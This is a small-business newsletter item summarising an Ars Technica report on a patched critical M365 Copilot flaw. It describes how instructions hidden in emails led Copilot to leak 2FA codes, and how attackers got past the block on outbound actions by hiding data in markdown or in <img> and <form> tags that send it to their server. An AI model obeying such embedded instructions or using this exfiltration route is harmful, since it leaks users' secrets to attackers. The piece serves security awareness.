UpTrajectory Review
A recent report highlights a critical vulnerability in Microsoft's M365 Copilot AI platform, which could allow malicious actors to extract sensitive information such as two-factor authentication codes from user emails. This issue underscores the broader security challenges faced by AI platforms, particularly their inability to differentiate between legitimate user commands and harmful requests embedded in third-party content.
For small business owners, this vulnerability serves as a stark reminder of the security risks associated with adopting AI technologies. As AI tools become more integrated into daily operations, understanding their limitations is crucial. Companies must remain vigilant and consider implementing additional security measures to protect sensitive data, especially when using AI platforms that may inadvertently expose it. The reliance on AI should not overshadow the need for robust cybersecurity practices.
“Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data.” — Ars Technica
Takeaway: Stay informed about AI security vulnerabilities and reinforce your cybersecurity measures to protect sensitive business data.
From the original item — Ars Technica:
Last Tuesday, Microsoft patched a vulnerability it rated as max critical in its M365 Copilot AI platform. On Monday, the researchers who discovered the vulnerability and reported it to Microsoft revealed how their proof-of-concept exploit could retrieve 2FA codes and other sensitive data from emails accessible to Copilot.
Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data. The root cause: AI bots are unable to distinguish between instructions provided by users and those snuck into third-party content the models are summarizing, drafting responses to, or using to perform other actions on behalf of the user. With no way to secure this crucial boundary, Microsoft and its peers are left to erect complicated and ad hoc guardrails designed to rein in the consequences of this incurable gullibility.
One guardrail built into Copilot and most other LLMs prevents them from submitting web forms, sending emails, and taking similar actions that can be used to exfiltrate data from the user. To work around this, LLM hackers turned to markup language, which, among other things, allows users to add formatting elements such as headings, lists, and links to text without the need for HTML tags. Another workaround is to wrap sensitive data inside HTML tags such as <img> and <form>. In either case, a web request showing the data hits the attacker’s web server, where the secret information is captured in logs.